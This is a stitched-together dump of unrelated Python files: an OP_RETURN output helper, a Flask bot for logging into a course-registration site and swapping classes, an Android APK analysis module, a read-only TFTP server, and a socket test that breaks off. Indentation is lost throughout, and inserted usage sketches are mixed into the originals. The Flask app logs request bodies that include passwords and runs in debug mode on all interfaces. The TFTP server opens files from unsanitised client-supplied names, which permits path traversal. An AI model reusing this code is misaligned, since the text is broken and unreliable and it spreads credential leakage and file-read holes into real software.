if not isinstance(op_return, str):
raise OPReturn.Error('OP_RETURN parameter needs to be of type str!')
if op_return == 'empty':
op_return = ''
try:
op_return_script = b'\x6a' + bytes.fromhex(op_return.strip())
except ValueError:
raise OPReturn.Error(_('OP_RETURN script expected to be hexadecimal bytes'))
if len(op_return_script) > 223:
raise OPReturn.TooLarge(_("OP_RETURN script too large, needs to be no longer than 223 bytes"))
amount = 0
return (TYPE_SCRIPT, ScriptOutput.protocol_factory(op_return_script), amount)
# /OPReturn
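# --- Hedged usage sketch (not part of the original file) ---------------------
# Shows how the OPReturn helpers above are typically used to build tx outputs:
# output_for_stringdata() enforces the 220-byte limit on the UTF-8 message and
# returns a (TYPE_SCRIPT, ScriptOutput, 0) tuple; output_for_rawhex() takes the
# script bytes (hex) that follow the leading OP_RETURN (0x6a) opcode.
def _example_op_return_outputs():
    outputs = []
    try:
        outputs.append(OPReturn.output_for_stringdata("hello from OP_RETURN"))
        outputs.append(OPReturn.output_for_rawhex("deadbeef"))
    except OPReturn.TooLarge:
        pass  # message/script exceeded the allowed size
    except OPReturn.Error:
        pass  # wrong type or malformed hex
    return outputs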
|
application.py
|
# -*- coding: utf-8 -*-
from flask import Flask, request, render_template
from flask_cors import CORS
from concurrent.futures import ThreadPoolExecutor
import threading
import json
from swap_class import *
import time
import logging
logging.basicConfig(level=logging.DEBUG,
format='%(asctime)s.%(msecs)03d %(levelname)s:\t%(message)s', datefmt='%Y-%m-%d %H:%M:%S')
logger = logging.getLogger(__name__)
app = Flask(__name__, static_folder="static", template_folder="templates")
CORS(app)
bot = Hkuspace_bot()
main_swap_bot = Parallel_swap()
@app.route("/")
def test_page():
return render_template("index.html")
@app.route("/login", methods=["POST"])
def login_hkuspace():
request_data = request.get_json()
login_name = request_data["username"]
password = request_data["password"]
valid = bot.login_space(login_name, password)
if valid == False:
return {"code": 401, "message": "Unauthorized username or password"}, 401
else:
# bot.get_time_table()
return {"code": 200, "message": "Successfully login"}, 200
@app.route("/login-close", methods=["GET"])
def close_login():
valid = bot.check_login()
if valid == True:
return {"code": 200, "message": "Login page closed successfully"}, 200
else:
return {"code": 404, "message": "Google chrome not found"}, 404
@app.route("/status", methods=["GET"])
def check_status():
    # poll until the swap platform reports ready
    while not bot.check_status():
        time.sleep(5)
return {"code": 200, "message": "The swap platform is ready"}, 200
@app.route("/check-class", methods=["POST"])
def check_class():
request_data = request.get_json()
class_id = request_data["course_code"]
result = bot.swap_class_check(class_id)
return json.dumps(result), 200
@app.route("/add-drop", methods=["POST"])
def add_drop_class():
request_data = request.get_json()
class_drop = request_data["origin_code"]
class_add = request_data["new_code"]
class_id = request_data["new_class"]
boost = request_data["boost"]
if boost == True:
target = request_data["crush_num"]
result = bot.add_drop_class(
class_drop, class_add, class_id, boost, target)
else:
result = bot.add_drop_class(class_drop, class_add, class_id, boost)
logger.debug(f"Json return: {request_data}")
return json.dumps(result), 200
@app.route("/main-swap", methods=["POST"])
def main_swap():
request_data = request.get_json()
logger.debug(f"Total add-drop: {request_data}")
username = request_data["username"]
password = request_data["password"]
data = request_data["data"]
workers = len(data)
thread1 = threading.Thread(
target=thread_func, args=(username, password, data, workers,))
thread1.start()
return {"code": 200, "message": "The program started!"}
def thread_func(username, password, request_data, workers=3):
data = [{"username": username, "password": password,
"request_data": request_data[i]} for i in range(0, workers)]
with ThreadPoolExecutor() as e:
results = list(e.map(main_swap_bot.main, data))
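# --- Hedged usage sketch (not part of the original file) ----------------------
# Example of the JSON payload /main-swap expects, as read by main_swap() above:
# one worker is spawned per entry in "data".  The per-entry fields are borrowed
# from the /add-drop route and are illustrative only; the real schema is
# whatever swap_class.Parallel_swap.main() consumes.
_EXAMPLE_MAIN_SWAP_PAYLOAD = {
    "username": "student01",
    "password": "********",
    "data": [
        {"origin_code": "CCIT4020", "new_code": "CCIT4021",
         "new_class": "2A", "boost": False},
        {"origin_code": "CCHU4011", "new_code": "CCHU4012",
         "new_class": "1B", "boost": True, "crush_num": 3},
    ],
}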
if __name__ == "__main__":
app.run(host="0.0.0.0", port=8080, debug=True)
|
__init__.py
|
# encoding: utf-8
import imp
from itertools import repeat
from multiprocessing import Value, RLock, cpu_count
from multiprocessing.process import Process
import os
import sys
from androlyze import settings
from androlyze.loader.exception import ApkImportError
from androlyze.log.Log import clilog, log
from androlyze.model.analysis.result import StaticResultKeys
from androlyze.model.script import ScriptUtil
from androlyze.settings import SECTION_ANDROGUARD, KEY_ANDROGUARD_PATH, \
CONFIG_PATH, DEFAULTS_PATH
from androlyze.settings.Settings import Settings
from androlyze.storage import Util
from androlyze.storage.exception import StorageException
from androlyze.storage.resultdb import MongoUtil
from androlyze.util import Util
from androlyze.Constants import *
__all__ = []
__author__ = u"Nils Tobias Schmidt, Lars Baumgärtner"
__copyright__ = PROJECT_COPYRIGHT
__license__ = PROJECT_LICENSE
__version__ = PROJECT_VERSION
__email__ = "{schmidt89,lbaumgaertner}@informatik.uni-marburg.de"
try:
# load androguard
Util.set_androguard_path(settings.singleton)
# import namespace of androguards androlyze.py module
imp.load_source("androlyze", "%s/androlyze.py" % settings.singleton[(SECTION_ANDROGUARD, KEY_ANDROGUARD_PATH)])
from androlyze import *
except Exception as e:
log.error(e)
############################################################
#---Import
############################################################
def action_import_apks(storage, apk_paths,
copy_apk = False, copy_to_mongodb = False,
update = False, tag = None,
# shared memory
cnt_imported_apks = None, total_apk_count = None, import_finished = None,
# concurrent settings
concurrency = None
):
''' Import the apks from the `apk_paths` and create the file system structure
where the results will be kept, specified by `storage`.
Parameters
----------
storage : RedundantStorage
The store to use.
apk_paths : iterable<str>
The apk files and/or directories.
copy_apk : bool
Import the apk file to the `import_dir` (copy it).
copy_to_mongodb : bool, optional (default is False)
Also import into MongoDB. Useful for the distributed analysis.
update : bool
Update apks that have already been imported.
tag : str, optional (default is None)
Some tag
cnt_imported_apks : multiprocessing.Value<int>, optional (default is None)
If given, use for progress updating.
total_apk_count : multiprocessing.Value<int>, optional (default is None)
If given, use for total count of apks.
import_finished : multiprocessing.Value<byte>, optional (default is None)
If given, use to signal that import has been completed.
concurrency : int, optional (default is number of cpus)
Number of processes to use for the import.
'''
from androlyze.loader.ApkImporter import ApkImporter
# get single paths to apks so we get the correct total count of apks
clilog.info("looking for apks in given paths ... ")
apk_paths = ApkImporter.get_apks_from_list_or_dir(apk_paths)
if total_apk_count is not None:
# may be time consuming for recursive lookup
apk_paths, total_apk_count.value = Util.count_iterable_n_clone(apk_paths)
# create count if not given
if cnt_imported_apks is None:
cnt_imported_apks = Value('i', 0, lock = RLock())
# set concurrency
if concurrency is None:
concurrency = cpu_count()
log.warn("Using %d processes", concurrency)
clilog.info("Storage dir is %s" % storage.fs_storage.store_root_dir)
if copy_apk:
clilog.info("Copying APKs to %s ..." % storage.fs_storage.store_root_dir)
def import_apks(apk_paths):
apk_importer = ApkImporter(apk_paths, storage)
for apk in apk_importer.import_apks(copy_apk = copy_apk, copy_to_mongodb = copy_to_mongodb,
update = update, tag = tag):
clilog.info("imported %s", apk.short_description())
# use shared memory counter if given
if cnt_imported_apks is not None:
with cnt_imported_apks.get_lock():
cnt_imported_apks.value += 1
pool = []
# don't convert generator to list if only 1 process wanted
apk_paths = [apk_paths] if concurrency == 1 else Util.split_n_uniform_distri(list(apk_paths), concurrency)
# start parallel import
# multiprocessing's pool causes pickle errors
for i in range(concurrency):
p = Process(target = import_apks, args = (apk_paths[i], ))
log.debug("starting process %s", p)
pool.append(p)
p.start()
for it in pool:
        log.debug("joining process %s", it)
it.join()
apks_imported = cnt_imported_apks.value != 0
# show some message that no APK has been imported
if not apks_imported:
log.warn("No .apk file has been imported! This means no .apk file has been found or they already have been imported.")
else:
clilog.info("done")
    # because not all apks may be importable, we cannot use the count to signal that the import is done
if import_finished is not None:
import_finished.value = 1
clilog.info("Imported %d apks", cnt_imported_apks.value)
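# --- Hedged usage sketch (not part of the original module) -------------------
# Drives action_import_apks() with the optional shared-memory progress values
# described in its docstring.  `storage` is assumed to be an already-constructed
# RedundantStorage and `paths` a list of .apk files and/or directories.
def _example_import_with_progress(storage, paths):
    cnt = Value('i', 0, lock = RLock())
    total = Value('i', 0)
    finished = Value('b', 0)
    action_import_apks(storage, paths,
                       copy_apk = True, tag = "example-run",
                       cnt_imported_apks = cnt, total_apk_count = total,
                       import_finished = finished,
                       concurrency = 2)
    return cnt.value, total.value, bool(finished.value)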
############################################################
#---Query
############################################################
############################################################
#--- Query commands
############################################################
# query subcommands
COMMAND_QUERY_APKS = "apks"
COMMAND_QUERY_HASHES = "hashes"
COMMAND_QUERY_PACKAGE_NAMES = "package-names"
COMMAND_QUERY_PATHS = "paths"
COMMAND_QUERY_INFOS_ALL = "infos-all"
COMMAND_QUERY_INFOS = "infos"
COMMAND_QUERY_VERSIONS = "versions"
QUERY_COMMANDS = (COMMAND_QUERY_HASHES, COMMAND_QUERY_PACKAGE_NAMES,
COMMAND_QUERY_INFOS_ALL, COMMAND_QUERY_INFOS,
COMMAND_QUERY_VERSIONS, COMMAND_QUERY_APKS, COMMAND_QUERY_PATHS)
# TODO: ADD CHECKS FOR OTHER VALUES!
def action_query_result_db(storage, checks = {}, **kwargs):
'''
Get results from the database.
Parameters
----------
storage : ResultsStorageInterface
The store to use.
checks : dict, optional (default is {})
Dictionary describing the checks to perform on some values.
Will be passed to :py:method:`.MongoUtil.build_checks_filter` (as keyword arguments)
checks_non_empty_list : iterable<str>, optional (default is ())
Check the keys against a non empty list.
checks_empty_list : iterable<str>, optional (default is ())
Check the keys against an empty list.
checks_true : iterable<str>, optional (default is ())
Check if the values of the given keys are true.
checks_false : iterable<str>, optional (default is ())
Check if the values of the given keys are false.
checks_not_null : iterable<str>, optional (default is ())
Check if the values of the given keys are null (python None).
checks_null : iterable<str>, optional (default is ())
Check if the values of the given keys are not null (python None).
conjunction : str, optional (default is 'or')
Choose between 'or' and 'and'.
Specifies how to to link the checks together.
Other Parameters
----------------
include_fields : list<str>, optional (default is [])
List of fields to include in the result.
Mutually exclusive with `exclude_fields`.
exclude_fields : list<str>, optional (default is [])
List of fields to exclude from the result.
Mutually exclusive with `include_fields`.
where : dict, optional (default is {})
A filter.
remove_id_field : bool, optional (default is True)
Will remove the `_id` field by default.
distinct_key : str, optional (default is None)
        If given, list the distinct values for the `distinct_key`.
list_ran_scripts: bool, optional (default is False)
List all scripts that have been run on the given selection.
Normally you want to supply the `package_name`.
Overrides `distinct_key`.
sort : bool, optional (default is True)
If true sort by analysis date.
latest : bool, optional (default is False)
Get the result of the latest script run.
Will only return one result.
n : int, optional (default is None)
Number of results to return.
None means no limit.
non_document : bool, optional (default is False)
Get custom data from mongodb's gridfs.
non_document_raw : bool, optional (default is False)
Get the raw data from the database. Otherwise meta infos will be returned.
Only interesting if `non_document`.
package_name : str, optional (default is None)
apk_hash : str, optional (default is None)
version_name : str, optional (default is None)
tag : str, optional (default is None)
script_hash : str, optional (default is None)
script_name : str, optional (default is None)
script_version : str, optional (default is None)
Notes
-----
If any of the other parameters is None it won't be used for filtering.
Returns
-------
gridfs.grid_file.GridOutCursor
If non_document and non_document_raw.
pymongo.cursor.Cursor
Otherwise
Raises
------
DatabaseLoadException
Examples
--------
    >>> import androlyze
... from androlyze.storage.resultdb.ResultDatabaseStorage import ResultDatabaseStorage
... from androlyze.model.script.ScriptUtil import dict2json
... storage = ResultDatabaseStorage('127.0.0.1', 27017)
... res = androlyze.action_query_result_db(storage, n = 2, script_name = "ChainedApkInfos", include_fields = ["apkinfo.components.activities"])
... for r in res:
... # get dict
... # print r
... # get json
... print dict2json(r)
{
"apkinfo": {
"components": {
"activities": {
"all": [
"cn.wps.impress.test.selfvalidate.lmj.TestServiceActivity",
...
'''
# build check filter dict if some checks are given which shall be done on some attributes
if checks:
checks = MongoUtil.build_checks_filter(**checks)
# update with checks dict or {}
if 'where' in kwargs and kwargs['where'] is not None:
kwargs['where'].update(checks)
else:
kwargs['where'] = checks
non_document = kwargs.get("non_document", False)
if kwargs.get("list_ran_scripts", False):
kwargs['distinct_key'] = MongoUtil.get_attr_str(StaticResultKeys.RESOBJ_SCRIPT_META, StaticResultKeys.RESOBJ_SCRIPT_META_NAME, non_document)
return storage.get_results(**kwargs)
def action_query_import_db(storage, query_cmd, hashes = None, package_names = None, tags = None, **kwargs):
''' Returns the result of the query action.
For additional keyword-arguments see :py:meth:`.ImportStorageInterface.get_imported_apks`.
Parameters
----------
storage : ImportQueryInterface
The store to use.
query_cmd : str
The query command.
See variables prefixed with `COMMAND_QUERY_`.
hashes : iterable<str>, optional (default is None)
package_names : iterable<str>, optional (default is None)
tags : iterable<str>, optional (default is None)
order_by : str, optional (default is None)
Sort apks by key.
Returns
-------
iterable<Apk>.
If `query_cmd is` `COMMAND_QUERY_APKS`
iterable<str>
Raises
------
ValueError
If an unknown `query_cmd` has been given
'''
    if query_cmd not in QUERY_COMMANDS:
raise ValueError("Unknown query cmd: %s" % query_cmd)
res = None
if query_cmd in (COMMAND_QUERY_INFOS, COMMAND_QUERY_INFOS_ALL, COMMAND_QUERY_APKS):
apks = storage.get_imported_apks(hashes, package_names, tags, **kwargs)
if query_cmd == COMMAND_QUERY_APKS:
return apks
# verbose
if query_cmd == COMMAND_QUERY_INFOS_ALL:
res = (apk.detailed_description() for apk in apks)
# non-verbose
elif query_cmd == COMMAND_QUERY_INFOS:
res = (apk.short_description() for apk in apks)
elif query_cmd == COMMAND_QUERY_PACKAGE_NAMES:
res = storage.get_apk_package_names(hashes, tags)
elif query_cmd == COMMAND_QUERY_PATHS:
res = storage.get_apk_paths(hashes, package_names, tags)
elif query_cmd in (COMMAND_QUERY_VERSIONS, COMMAND_QUERY_HASHES):
if query_cmd == COMMAND_QUERY_HASHES:
res = storage.get_apk_hashes(package_names, tags)
elif query_cmd == COMMAND_QUERY_VERSIONS:
res = storage.get_versions(hashes, package_names, tags)
return res
############################################################
#---Analyze
############################################################
ANALYZE_MODE_PARALLEL = 'parallel'
ANALYZE_MODE_NON_PARALLEL = 'non-parallel'
ANALYZE_MODE_DISTRIBUTED = 'distributed'
def action_analyze(storage, script_list, apks_or_paths = None,
mode = ANALYZE_MODE_PARALLEL, concurrency = None,
serialize_apks = True
):
'''
Analyze the `apks_or_paths` with the given `script_list`.
Parameters
----------
storage : RedundantStorage
The store to use.
script_list : list<str>
List of paths to scripts (complete filename with extension).
apks_or_paths: list<str> or list<Apk>, optional (default is None)
List of `Apk` or paths to the apks which shall be analyzed with the given scripts
If you analyze from paths the `import_date` is not set!
mode : str, optional (default is `ANALYZE_MODE_PARALLEL`)
        Do a parallel analysis by default. Choose between `ANALYZE_MODE_PARALLEL`,
        `ANALYZE_MODE_NON_PARALLEL` and `ANALYZE_MODE_DISTRIBUTED`.
concurrency : int, optional (default is number of cpu cores)
Number of workers to spawn.
serialize_apks : bool, optional (default is True)
        If true, serialize the .apk file.
        Otherwise the id (hash) of the apk will be sent and the apk fetched by the worker from the result db.
Be sure to import the apks to the result db first!
'''
analyzer = create_analyzer(storage, script_list, apks_or_paths, mode, concurrency, serialize_apks)
if analyzer is not None:
return run_analysis(analyzer)
def create_analyzer(storage, script_list, apks_or_paths = None,
mode = ANALYZE_MODE_PARALLEL, concurrency = None,
serialize_apks = True
):
'''
Create the analyzer only.
Parameters
----------
storage : RedundantStorage
The store to use.
script_list : list<str>
List of paths to scripts (complete filename with extension).
apks_or_paths: list<str> or list<Apk>, optional (default is None)
List of `Apk` or paths to the apks which shall be analyzed with the given scripts
If you analyze from paths the `import_date` is not set!
mode : str, optional (default is `ANALYZE_MODE_PARALLEL`)
        Do a parallel analysis by default. Choose between `ANALYZE_MODE_PARALLEL`,
        `ANALYZE_MODE_NON_PARALLEL` and `ANALYZE_MODE_DISTRIBUTED`.
concurrency : int, optional (default is number of cpu cores)
Number of workers to spawn.
serialize_apks : bool, optional (default is True)
        If true, serialize the .apk file.
        Otherwise the id (hash) of the apk will be sent and the apk fetched by the worker from the result db.
Be sure to import the apks to the result db first!
'''
from androlyze.model.script import ScriptUtil
from androlyze.analyze.exception import AndroScriptError
try:
# list<type<AndroScript>>
androscript_list = ScriptUtil.import_scripts(script_list)
instantiated_scripts = sorted(ScriptUtil.instantiate_scripts(androscript_list, script_paths = script_list))
if len(instantiated_scripts) == 0:
log.warn("No scripts supplied!")
return
# get hashes for `AndroScript`s so that we can set the hash directly next time we instantiate the script
script_hashes = [s.hash for s in instantiated_scripts]
min_script_needs = ScriptUtil.get_minimum_script_options(instantiated_scripts)
# log infos about scripts
clilog.info('Loaded scripts:\n%s', '\n'.join((str(s) for s in instantiated_scripts)))
log.info(ScriptUtil.androscript_options_descr(instantiated_scripts))
if apks_or_paths:
def create_analyzer():
analyzer = None
# argument for BaseAnalyzer
args = storage, androscript_list, script_hashes, min_script_needs, apks_or_paths
log.info("Mode: %s", mode)
# normal analyzer
if mode == ANALYZE_MODE_NON_PARALLEL:
from androlyze.analyze.Analyzer import Analyzer
analyzer = Analyzer(*args)
# use parallel analyzer
elif mode == ANALYZE_MODE_PARALLEL:
from androlyze.analyze.parallel.ParallelAnalyzer import ParallelAnalyzer
analyzer = ParallelAnalyzer(*args, concurrency = concurrency)
# use distributed one
elif mode == ANALYZE_MODE_DISTRIBUTED:
from androlyze.analyze.distributed.DistributedAnalyzer import DistributedAnalyzer
analyzer = DistributedAnalyzer(*args, concurrency = concurrency, serialize_apks = serialize_apks)
return analyzer
return create_analyzer()
except ApkImportError as e:
log.warn(e)
except IOError as e:
log.warn(AndroScriptError(e.filename, caused_by = e))
sys.exit(1)
except ImportError as e:
log.exception(e)
except Exception as e:
log.exception(e)
def run_analysis(analyzer):
''' Run the analysis with the `analyzer`.
Parameters
----------
analyzer : BaseAnalyzer
Returns
-------
int
Number of analyzed apks.
'''
from androlyze.analyze.exception import AndroScriptError
try:
cnt_analyzed_apks = analyzer.analyze()
if cnt_analyzed_apks == 0:
log.warn("No apk file has been analyzed !")
else:
log.warn("Analyzed %s apks", cnt_analyzed_apks)
return cnt_analyzed_apks
except AndroScriptError as e:
log.exception(e)
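# --- Hedged usage sketch (not part of the original module) -------------------
# Ties the pieces above together: query the imported apks, then analyze them
# in parallel with a script.  The script path is illustrative only.
def _example_analyze_imported_apks(storage):
    apks = list(action_query_import_db(storage, COMMAND_QUERY_APKS))
    return action_analyze(storage,
                          ["scripts/ChainedApkInfos.py"],  # hypothetical path
                          apks_or_paths = apks,
                          mode = ANALYZE_MODE_PARALLEL,
                          concurrency = 2)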
############################################################
#---Delete
############################################################
def action_delete_apks_import(storage, delete_apk = False, hashes = None, package_names = None, tags = None, select_whole_db = False):
''' Delete from the import storage (database and/or filesys)
Parameters
----------
storage : RedundantStorage
The store to use.
delete_apk : boolean, optional (default is False)
hashes : iterable<str>, optional (default is None)
package_names : iterable<str>, optional (default is None)
tags : iterable<str>, optional (default is None)
select_whole_db : boolean, optional (default is False)
If true, select the whole import database! Be careful!
        This means we do not take `hashes`, `package_names` and `tags` into account!
Raises
------
ValueError
'''
try:
apks = None
if select_whole_db:
apks = action_query_import_db(storage, COMMAND_QUERY_APKS, hashes, package_names, tags)
        # only proceed if at least one filter was given -- never delete the whole database by accident!
elif len(Util.filter_not_none((hashes, package_names, tags))) > 0:
apks = action_query_import_db(storage, COMMAND_QUERY_APKS, hashes, package_names, tags)
else:
raise ValueError('''Neither hashes nor package names nor tags specified!
            If you want to use the whole database, set `select_whole_db` to true.
''')
# use list, otherwise we have duplicates due to the generator
for apk in list(apks):
if delete_apk:
clilog.info("Will delete from database and file system: \n%s ", apk.detailed_description())
else:
clilog.info("Will delete %s from database: %s ", apk.short_description(), storage.import_db_storage)
storage.delete_entry_for_apk(apk, delete_apk)
except StorageException as e:
log.warn(e)
def action_delete_apks_res(storage,
where = None, non_document = False, whole_db = False, **kwargs):
'''
Delete some results from the database.
Parameters
----------
storage : RedundantStorage
The store to use.
where : dict, optional (default is {})
A filter.
non_document : bool, optional (default is False)
Remove from gridfs.
whole_db : bool, optional (default is False)
Other Parameters
----------------
package_name : str, optional (default is None)
apk_hash : str, optional (default is None)
version_name : str, optional (default is None)
tag : str, optional (default is None)
script_hash : str, optional (default is None)
script_name : str, optional (default is None)
script_version : str, optional (default is None)
Notes
-----
If any of the other parameters is None it won't be used for filtering.
    They may also overwrite the other ones.
Returns
-------
int
Number of documents which have been removed.
If not `whole_db`
None
'''
if whole_db:
storage.erase_whole_db()
return None
return storage.delete_results(where, non_document, **kwargs)
############################################################
#---Sync
############################################################
def action_sync_fs(storage, continue_func = lambda _ : True, wait_for_db = True,
                   # progress
synced_entries = None, total_sync_entries = None):
'''
Sync file system with result database.
Parameters
----------
storage : RedundantStorage
The store to use.
    continue_func : int -> bool, optional (default always returns True)
        This function will be executed before the actual sync starts, with the number of total items to fetch.
The function determines via return value if the action shall be done.
wait_for_db : bool, optional (default is True)
Wait until data could be fetched from db.
synced_entries : multiprocessing.Value<int>, optional (default is None)
        If supplied, store the number of already synced entries.
total_sync_entries : multiprocessing.Value<int>, optional (default is None)
        If supplied, store the total number of entries to sync.
Returns
-------
int
Number of entries to sync/synced.
'''
fs_storage = storage.fs_storage
rds = storage.result_db_storage
# get id' for non-gridfs
document_ids = rds.get_ids(non_document = False)
# get id' for gridfs
gridfs_ids = rds.get_ids(non_document = True)
# total number of entries
total_entries = len(document_ids) + len(gridfs_ids)
# check if really sync wanted
if continue_func(total_entries):
# do sync
fs_storage.fetch_results_from_mongodb(rds, zip(document_ids, repeat(False)) + zip(gridfs_ids, repeat(True)),
nice_progess = True, wait_for_db = wait_for_db,
synced_entries = synced_entries, total_sync_entries = total_sync_entries)
return total_entries
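# --- Hedged usage sketch (not part of the original module) -------------------
# Example wiring for action_sync_fs(): skip very large syncs via continue_func,
# otherwise report progress through shared-memory counters.
def _example_sync_fs(storage):
    synced = Value('i', 0)
    total = Value('i', 0)
    n = action_sync_fs(storage,
                       continue_func = lambda total_entries: total_entries < 10000,
                       wait_for_db = True,
                       synced_entries = synced, total_sync_entries = total)
    clilog.info("sync requested for %d entries (synced so far: %d)", n, synced.value)
    return n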
|
tftp.py
|
# import click
from socket import AF_INET, SOCK_DGRAM, socket
from struct import unpack, pack
from threading import Thread
from zipfile import ZipFile
import io
import os
from piman import logger
"""
This code was modified following Prof. Reed's suggestion
"""
"""
The TFTPServer class encapsulates the methods required for running a simple TFTP server that handles only read requests.
The server is initialized with a data directory, a port, and a connection address.
The data directory, port, and connection address are specified in the configuration file
(note: sudo must be used if using port 69).
"""
class TFTPServer:
RRQ_OPCODE = 1
DATA_OPCODE = 3
ACK_OPCODE = 4
ERROR_OPCODE = 5
# TFTP data packets consist of a 2-byte opcode, 2-byte block number, and up to 512-byte data portion
    # Since our server only receives RRQ and ACK packets, we could have set the
    # buffer to a smaller, more optimized value (e.g. filenames on Mac OS X can
    # have up to 256 characters, so we could limit the buffer to the max size of
    # an RRQ packet), but for better practice it's been set to the max data
    # packet length in TFTP.
BUFFER_SIZE = 516
# ctor for setting configurable attributes
def __init__(self, data_dir, tftp_port, connection_address):
self.data_dir = data_dir
self.tftp_port = tftp_port
self.connection_address = connection_address
# opens install/boot in zipfile
def res_open(self, name):
zipfile = os.path.dirname(os.path.dirname(__file__))
fd = None
try:
with ZipFile(zipfile) as z:
fd = z.open("install/boot/" + name)
except KeyError:
logger.error("{}: key error - looking in filesystem next".format(name))
pass # we'll try looking in the filesystem next
if not fd:
fd = open("{}/{}".format(self.data_dir, name), "rb")
if 'cmdline.txt' in name and fd:
# we need to fixup the master address
content = fd.read()
fd.close()
fd = io.BytesIO(content.replace(b'MASTER', self.connection_address.encode()))
return fd
"""
Begins running the server thread
"""
def start(self):
self.server_socket = socket(AF_INET, SOCK_DGRAM)
# We can specify a specific address when running the server (defaults to '')
logger.info("connecting to {}:{}".format(self.connection_address, self.tftp_port))
self.server_socket.bind((self.connection_address, self.tftp_port))
logger.info("serving files from {} on port {}".format(self.data_dir, self.tftp_port))
self.tftp_thread = Thread(target=self.__process_requests, name="tftpd")
self.tftp_thread.start()
def stop(self):
self.server_socket.close()
"""
This code is responsible for handling requests (both valid and invalid) as well as ensuring data is transferred
properly and reliably.
"""
def __process_requests(self):
# this while loop keeps our server running also accounting for ensuring the initial
# data packet is retrieved by the host
        # accepts RRQ's for files and starts a thread to process each one
logger.info("TFTP waiting for request")
while True:
pkt, addr = self.server_socket.recvfrom(self.BUFFER_SIZE)
t1 = Thread(
target=self.__create_thread_and_process_requests, args=(pkt, addr))
t1.daemon = True
t1.start()
"""
This code is responsible for handling requests. It starts a new socket with an ephemeral port
for communication to the client. If no response is heard after 10 seconds, the socket is closed and function ends.
"""
def __create_thread_and_process_requests(self, pkt, addr):
# initial block number and variable for filename
block_number = 0
filename = ''
# prepare the UDP socket
client_dedicated_sock = socket(AF_INET, SOCK_DGRAM)
# bind to 0 for an ephemeral port
client_dedicated_sock.bind((self.connection_address, 0))
# set timeout for the socket
client_dedicated_sock.settimeout(10)
# RRQ is a series of strings, the first two being the filename
# and mode but there may also be options. see RFC 2347.
#
# we skip the first 2 bytes (the opcode) and split on b'\0'
# since the strings are null terminated.
#
# because b'\0' is at the end of all strings split will always
# give us an extra empty string at the end, so skip it with [:-1]
strings_in_RRQ = pkt[2:].split(b"\0")[:-1]
logger.info("got {} from {}".format(strings_in_RRQ, addr))
filename = strings_in_RRQ[0]
# opens the file once for the socket, opening multiple times causes tftp to be slow
try:
transfer_file = self.res_open(strings_in_RRQ[0].decode())
while True:
# the first two bytes of all TFTP packets is the opcode, so we can
# extract that here. the '!' is for big endian, and 'H' is to say it is an integer
[opcode] = unpack("!H", pkt[0:2])
if opcode == TFTPServer.RRQ_OPCODE:
# set the opcode for the packet we are sending
transfer_opcode = pack("!H", TFTPServer.DATA_OPCODE)
# read up to the appropriate 512 bytes of data
data = transfer_file.read(512)
                    # if data is received, increment the block number, construct the packet, and send it
if data:
block_number += 1
transfer_block_number = pack("!H", block_number)
packet = transfer_opcode + transfer_block_number + data
client_dedicated_sock.sendto(packet, addr)
# ACK received, so we can now read the next block, if it doesn't match resend the previous block of data
elif opcode == TFTPServer.ACK_OPCODE:
[acked_block] = unpack("!H", pkt[2:4])
# block number matches, the block sent was successfully received
if acked_block == block_number:
data = transfer_file.read(512)
# if data read, increment block number, construct packet, and send it on the socket
if data:
block_number += 1
transfer_block_number = pack("!H", block_number)
packet = transfer_opcode + transfer_block_number + data
client_dedicated_sock.sendto(packet, addr)
# if no data was read, read returns b'', then EOF was reached and download complete
else:
logger.warning('download complete, closing socket')
client_dedicated_sock.close()
break
                    # if the block number doesn't match, the data sent was not received
                    # here we can simply resend the data we already read; there's no need to
                    # seek or read again, and doing so would only slow the transfer down
elif block_number != acked_block:
# decrement block number
block_number = block_number - 1
transfer_block_number = pack("!H", block_number)
packet = transfer_opcode + transfer_block_number + data
client_dedicated_sock.sendto(packet, addr)
else:
# form an error packet and send it to the invalid TID
error_opcode = pack("!H", TFTPServer.ERROR_OPCODE)
error_code = pack("!H", 21)
error_message = b"incorrect TID\0"
logger.error("incorrect TID")
packet = error_opcode + error_code + error_message
client_dedicated_sock.sendto(packet, addr)
else:
# form an error packet and send it to the invalid TID
error_opcode = pack("!H", TFTPServer.ERROR_OPCODE)
error_code = pack("!H", 20)
error_message = b"illegal operation specified\0"
logger.error("illegal operation specified")
packet = error_opcode + error_code + error_message
client_dedicated_sock.sendto(packet, addr)
# listen for a client response for 10 seconds
# close everything and terminate if no response
try:
pkt, addr = client_dedicated_sock.recvfrom(
self.BUFFER_SIZE)
except:
logger.error("Socket Timed Out")
client_dedicated_sock.close()
logger.error('closed socket')
break
except FileNotFoundError:
# send an error packet to the requesting host
error_opcode = pack("!H", TFTPServer.ERROR_OPCODE)
error_code = pack("!H", 17)
error_message = b"No such file within the directory\0"
logger.error("No such file within the directory")
packet = error_opcode + error_code + error_message
client_dedicated_sock.sendto(packet, addr)
client_dedicated_sock.close()
def join(self):
self.tftp_thread.join()
def do_tftpd(data_dir, connection_address, tftp_port):
""" this is a simple TFTP server that will listen on the specified
    port and serve files rooted at the specified data directory. only read
requests are supported for security reasons.
"""
logger.warning("Starting TFTP...")
srvr = TFTPServer(data_dir, tftp_port, connection_address)
srvr.start()
srvr.join()
logger.warning("TFTP is terminating")
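# --- Hedged usage sketch (not part of the original file) ---------------------
# A minimal read-only TFTP client exercising the RRQ / DATA / ACK flow the
# server above implements (RFC 1350).  Host, port and filename are examples.
def _example_tftp_read(host="127.0.0.1", port=69, filename="cmdline.txt"):
    sock = socket(AF_INET, SOCK_DGRAM)
    sock.settimeout(10)
    # RRQ: opcode 1, filename, NUL, transfer mode, NUL
    sock.sendto(pack("!H", TFTPServer.RRQ_OPCODE) + filename.encode() + b"\0octet\0",
                (host, port))
    data = b""
    while True:
        pkt, addr = sock.recvfrom(TFTPServer.BUFFER_SIZE)
        opcode, block = unpack("!HH", pkt[0:4])
        if opcode != TFTPServer.DATA_OPCODE:
            break  # error packet or unexpected opcode
        data += pkt[4:]
        # acknowledge the block on the server's ephemeral (dedicated) port
        sock.sendto(pack("!H", TFTPServer.ACK_OPCODE) + pack("!H", block), addr)
        if len(pkt) - 4 < 512:  # a short data block marks the end of transfer
            break
    sock.close()
    return data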
if __name__ == "__main__":
do_tftpd()
|
server_get_scene_test.py
|
import socket
import time
import sys
import random
import math
import threading
HOST = ''
PORT = 8089
skt = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
skt.bind( (HOST, PORT) )
except socket.error as msg:
    print 'Bind failed. Error Code: ' + str(msg[0]) + ' Message: ' + msg[1]
sys.exit()
skt.listen(10)
def work(skt):
msg_header = 'AADD'
msg_stamp = '\x00\x00\x00\x00'
msg_id_gw = '2016A011'
msg_id_dev = '00000000'
msg_devtype = '\x00\x00'
